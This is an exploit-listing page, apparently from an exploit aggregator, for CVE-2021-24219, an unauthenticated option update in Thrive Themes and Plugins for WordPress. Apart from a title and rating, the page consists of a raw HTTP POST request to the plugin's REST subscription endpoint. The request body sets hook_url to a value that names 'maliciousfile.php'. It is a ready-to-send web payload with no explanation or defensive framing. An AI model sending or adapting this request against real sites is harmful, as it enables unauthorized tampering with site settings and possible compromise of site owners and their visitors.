Exploit for All Thrive Themes and Plugins - Unauthenticated Option Update CVE-2021-24219

Name: Exploit for All Thrive Themes and Plugins - Unauthenticated Option Update CVE-2021-24219
Rating: 5 (316 reviews)

2021-03-24 | CVSS 5.0

## https://sploitus.com/exploit?id=WPEX-ID:35ACD2D8-85FC-4AF5-8F6C-224FA7D92900
POST /wp-json/td/v1/optin/subscription HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

hook_url={"http:\/\/key":"maliciousfile.php"}&api_key=